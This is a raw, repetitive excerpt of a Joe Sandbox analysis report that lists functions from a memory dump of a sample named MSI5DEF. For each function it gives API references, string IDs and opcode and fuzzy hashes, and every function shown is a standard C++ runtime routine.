                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: a7a6367a453a9e5d01ad2291310d503631ae86e0bedad19672c5e675e8497945
                                                                        • Instruction ID: e97c1f1a8062e9e7a6ba8fafc62fb322e80a45423950f2b26b12f950dc560d37
                                                                        • Opcode Fuzzy Hash: a7a6367a453a9e5d01ad2291310d503631ae86e0bedad19672c5e675e8497945
                                                                        • Instruction Fuzzy Hash: 6801C03590061A9FCB11EBA4D94A6BE7BF5AF88710F240449F5156B2D2DF749F028B90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7AFA
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7B04
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7B55
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7B75
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7A65
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7A6F
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7AC0
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7AE0
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7B8F
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7B99
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7BEA
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7C0A
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B03CDB
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B03CE5
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00B03D36
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00B03D56
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B03C46
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B03C50
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00B03CA1
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00B03CC1
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7E78
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7E82
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7ED3
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7EF3
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7FA2
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7FAC
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7FFD
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF801D
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7F0D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7F17
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7F68
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7F88
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF5C6D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF5C78
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF5CE6
                                                                          • Part of subcall function 00AF5DC8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00AF5DE0
                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 00AF5C93
                                                                        Similarity
                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                        • String ID:
                                                                        • API String ID: 677527491-0
                                                                        APIs
                                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00B28643,?,00000001,?,?,?,00B27788,?,?,00000000), ref: 00B28C8D
                                                                        • GetLastError.KERNEL32(?,00B28643,?,00000001,?,?,?,00B27788,?,?,00000000,?,?,?,00B27D0F,?), ref: 00B28C99
                                                                          • Part of subcall function 00B28C5F: CloseHandle.KERNEL32(FFFFFFFE,00B28CA9,?,00B28643,?,00000001,?,?,?,00B27788,?,?,00000000,?,?), ref: 00B28C6F
                                                                        • ___initconout.LIBCMT ref: 00B28CA9
                                                                          • Part of subcall function 00B28C21: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B28C50,00B28630,?,?,00B27788,?,?,00000000,?), ref: 00B28C34
                                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00B28643,?,00000001,?,?,?,00B27788,?,?,00000000,?), ref: 00B28CBE
                                                                        Similarity
                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                        • String ID:
                                                                        • API String ID: 2744216297-0
                                                                        APIs
                                                                        • SleepConditionVariableCS.KERNELBASE(?,00B0789A,00000064), ref: 00B07920
                                                                        • LeaveCriticalSection.KERNEL32(00B44AF8,?,?,00B0789A,00000064,?,?,00AE25B6,00B4571C,1816BA6E,?,00000000,00B293ED,000000FF,?,00AE1A26), ref: 00B0792A
                                                                        • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00B0789A,00000064,?,?,00AE25B6,00B4571C,1816BA6E,?,00000000,00B293ED,000000FF,?,00AE1A26), ref: 00B0793B
                                                                        • EnterCriticalSection.KERNEL32(00B44AF8,?,00B0789A,00000064,?,?,00AE25B6,00B4571C,1816BA6E,?,00000000,00B293ED,000000FF,?,00AE1A26), ref: 00B07942
                                                                        Similarity
                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                        • String ID:
                                                                        • API String ID: 3269011525-0
                                                                        APIs
                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00B1712D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorHandling__start
                                                                        • String ID: pow
                                                                        • API String ID: 3213639722-2276729525
                                                                        • Opcode ID: dd69b4d104c03ca14c6baa695823bddba584f8adc77a39efc5570e74f41ec4a7
                                                                        • Instruction ID: 8b92d9bdffa6f872e2bdccb5fd3f7b941f4557a9175e7af62b2f7f16c2c6e4aa
                                                                        • Opcode Fuzzy Hash: dd69b4d104c03ca14c6baa695823bddba584f8adc77a39efc5570e74f41ec4a7
                                                                        • Instruction Fuzzy Hash: 79514761A5C207A6CB157724C9413FE6BF0EB81740FF089F9F495532A9EE34C8D5DA82
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldiv
                                                                        • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                        • API String ID: 3732870572-1956417402
                                                                        • Opcode ID: 229e32d245a78933840f458b07cd172d628725e143e3858362ecf2d83f4e7a82
                                                                        • Instruction ID: 78a0b2c930691dcebfea9663ac75e47534a62ee333a4da22c7576cabc0a04d9a
                                                                        • Opcode Fuzzy Hash: 229e32d245a78933840f458b07cd172d628725e143e3858362ecf2d83f4e7a82
                                                                        • Instruction Fuzzy Hash: DB51C170B042995AEF359F6D88917BEBFF6EF45310F1441EAE4D1D72C1C27489528B50
                                                                        APIs
                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00AEFA3E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Concurrency::cancel_current_task
                                                                        • String ID: false$true
                                                                        • API String ID: 118556049-2658103896
                                                                        • Opcode ID: 686695fd1856c14db1de8d03a5b7d2436b57d48f2d96f83ed5d28281b0cf3b26
                                                                        • Instruction ID: 176ad13c620d8efac59c1bd7e70ba98cfb8ca255f9caf0a8a0ff653277598216
                                                                        • Opcode Fuzzy Hash: 686695fd1856c14db1de8d03a5b7d2436b57d48f2d96f83ed5d28281b0cf3b26
                                                                        • Instruction Fuzzy Hash: 7051B3B1D003489FDB10DFA4C941BEEBBF8FF45304F14826AE945AB281E775AA45CB91
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00B022B1
                                                                        • _swprintf.LIBCMT ref: 00B02329
                                                                          • Part of subcall function 00AF780A: __EH_prolog3.LIBCMT ref: 00AF7811
                                                                          • Part of subcall function 00AF780A: std::_Lockit::_Lockit.LIBCPMT ref: 00AF781B
                                                                          • Part of subcall function 00AF780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF788C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~__swprintf
                                                                        • String ID: %.0Lf
                                                                        • API String ID: 2348759532-1402515088
                                                                        • Opcode ID: fd6b7c9eb21440af0ad4f24d82f0cf4de0679328cda46fcba138b7f31683415a
                                                                        • Instruction ID: 7e77e721d2ec55adb045572f37e88b2e77ad258533c03b383976ea6ed3bf1037
                                                                        • Opcode Fuzzy Hash: fd6b7c9eb21440af0ad4f24d82f0cf4de0679328cda46fcba138b7f31683415a
                                                                        • Instruction Fuzzy Hash: 43515C71D00258AFCF05DFE4D988ADDBBB9FF48300F204459E506AB2A5EB349909CF94
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00B02595
                                                                        • _swprintf.LIBCMT ref: 00B0260D
                                                                          • Part of subcall function 00AEB500: std::_Lockit::_Lockit.LIBCPMT ref: 00AEB52D
                                                                          • Part of subcall function 00AEB500: std::_Lockit::_Lockit.LIBCPMT ref: 00AEB550
                                                                          • Part of subcall function 00AEB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB578
                                                                          • Part of subcall function 00AEB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB617
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                        • String ID: %.0Lf
                                                                        • API String ID: 1487807907-1402515088
                                                                        • Opcode ID: 5c32574dd7da014efdd9f13ea6e467d63325e359b1db238506adcd7cca726138
                                                                        • Instruction ID: a1150e87ad00c4a2ec5e867d3d892f2c5680f5e60e2b29194e18959e84784fdd
                                                                        • Opcode Fuzzy Hash: 5c32574dd7da014efdd9f13ea6e467d63325e359b1db238506adcd7cca726138
                                                                        • Instruction Fuzzy Hash: AC517C71D00248AFCF05DFE4D999ADDBBB9FF48300F208459E946AB295EB359909CF90
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00B0660E
                                                                        • _swprintf.LIBCMT ref: 00B06686
                                                                          • Part of subcall function 00AEC590: std::_Lockit::_Lockit.LIBCPMT ref: 00AEC5BD
                                                                          • Part of subcall function 00AEC590: std::_Lockit::_Lockit.LIBCPMT ref: 00AEC5E0
                                                                          • Part of subcall function 00AEC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEC608
                                                                          • Part of subcall function 00AEC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEC6A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                        • String ID: %.0Lf
                                                                        • API String ID: 1487807907-1402515088
                                                                        • Opcode ID: 0df037f2ba760f063cb6ddcefe583e43824a68eb02b6d1320593a72d71a0a084
                                                                        • Instruction ID: 3509a7caea53da911234b495db4fffe7b4b4f0f577e0c189062597a400692302
                                                                        • Opcode Fuzzy Hash: 0df037f2ba760f063cb6ddcefe583e43824a68eb02b6d1320593a72d71a0a084
                                                                        • Instruction Fuzzy Hash: 42514971D00248AFCF09DFE4D885ADDBBB9FB48300F208599E516AB2A5EB359915CF50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \\?\$\\?\UNC\
                                                                        • API String ID: 0-3019864461
                                                                        • Opcode ID: a17f8c03a03cee336d165c82f1e9631a682f854327bd086f68e91d50599f2177
                                                                        • Instruction ID: fc59d0da238450380a74201048ddce82ce6946e43b5178a3914d6271b2479b35
                                                                        • Opcode Fuzzy Hash: a17f8c03a03cee336d165c82f1e9631a682f854327bd086f68e91d50599f2177
                                                                        • Instruction Fuzzy Hash: A751AF709103449BDB24CF66C995BEFBBF5FF98314F10451EE802A7290DBB5A988CB90
                                                                        APIs
                                                                        • EncodePointer.KERNEL32(00000000,?), ref: 00B0B5F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: EncodePointer
                                                                        • String ID: MOC$RCC
                                                                        • API String ID: 2118026453-2084237596
                                                                        • Opcode ID: 761f3eb95597e6f3b0359a5fe72bcc6b460015eb2955d58d2baf4aebd8c38776
                                                                        • Instruction ID: 6bd5f1300a8a1926847583541507c54a5f21337a9839011d281e89a0ca07bcd1
                                                                        • Opcode Fuzzy Hash: 761f3eb95597e6f3b0359a5fe72bcc6b460015eb2955d58d2baf4aebd8c38776
                                                                        • Instruction Fuzzy Hash: A0414672900209AFCF15DF98CD81EAEBFF5FF48304F188199F905A62A1D7369A50DB50
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00B02183
                                                                          • Part of subcall function 00AF780A: __EH_prolog3.LIBCMT ref: 00AF7811
                                                                          • Part of subcall function 00AF780A: std::_Lockit::_Lockit.LIBCPMT ref: 00AF781B
                                                                          • Part of subcall function 00AF780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF788C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                        • String ID: %.0Lf$0123456789-
                                                                        • API String ID: 2728201062-3094241602
                                                                        • Opcode ID: 2c1dc4d899479d5b2eea4961dcbbd06ab31c101bf6c33a6495bb8365e54985b7
                                                                        • Instruction ID: 7e0778530cd61af185011a92d65d62de1e9465d9c7bb62c12fbc731c768db6b7
                                                                        • Opcode Fuzzy Hash: 2c1dc4d899479d5b2eea4961dcbbd06ab31c101bf6c33a6495bb8365e54985b7
                                                                        • Instruction Fuzzy Hash: A2413631900218DFCF05EFD8D9849EDBFB5FF09310B10019AF911AB2A1DB309A5ACB95
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00B064E2
                                                                          • Part of subcall function 00AEC590: std::_Lockit::_Lockit.LIBCPMT ref: 00AEC5BD
                                                                          • Part of subcall function 00AEC590: std::_Lockit::_Lockit.LIBCPMT ref: 00AEC5E0
                                                                          • Part of subcall function 00AEC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEC608
                                                                          • Part of subcall function 00AEC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEC6A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                        • String ID: 0123456789-$0123456789-
                                                                        • API String ID: 2088892359-2494171821
                                                                        • Opcode ID: 921f73ab8d4901f7ac7c305021b0ed5e7eae036472960795e811725e97280d0d
                                                                        • Instruction ID: 04b9044d95af065cbd45ee57b26c7a835bfbbddbaf64a53cb85440c608fe1c62
                                                                        • Opcode Fuzzy Hash: 921f73ab8d4901f7ac7c305021b0ed5e7eae036472960795e811725e97280d0d
                                                                        • Instruction Fuzzy Hash: 43416C3190021DEFCF09DFA4D9919EE7FB5EF18310F10409AF421AB2A1DB34AA16CB55
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00B02467
                                                                          • Part of subcall function 00AEB500: std::_Lockit::_Lockit.LIBCPMT ref: 00AEB52D
                                                                          • Part of subcall function 00AEB500: std::_Lockit::_Lockit.LIBCPMT ref: 00AEB550
                                                                          • Part of subcall function 00AEB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB578
                                                                          • Part of subcall function 00AEB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB617
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                        • String ID: 0123456789-$0123456789-
                                                                        • API String ID: 2088892359-2494171821
                                                                        • Opcode ID: dc088f92fd7be0be0707c8245152c9ebba4b63628f8bae56ea813e3be8e420fe
                                                                        • Instruction ID: 40fe4dd8f9ce0ce083054d68d772c54b2e37ec7a263243c474acf3dec7b92831
                                                                        • Opcode Fuzzy Hash: dc088f92fd7be0be0707c8245152c9ebba4b63628f8bae56ea813e3be8e420fe
                                                                        • Instruction Fuzzy Hash: 17415831900258DFCF05DFA8D9959EDBFB5FF08310F1000A9F915AB2A1DB309A5ACB64
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog3___cftoe
                                                                        • String ID: !%x
                                                                        • API String ID: 855520168-1893981228
                                                                        • Opcode ID: d3571c8c23943aad0dd4fe49d3275653fadddc2db7ce0cdceb924f094a89006d
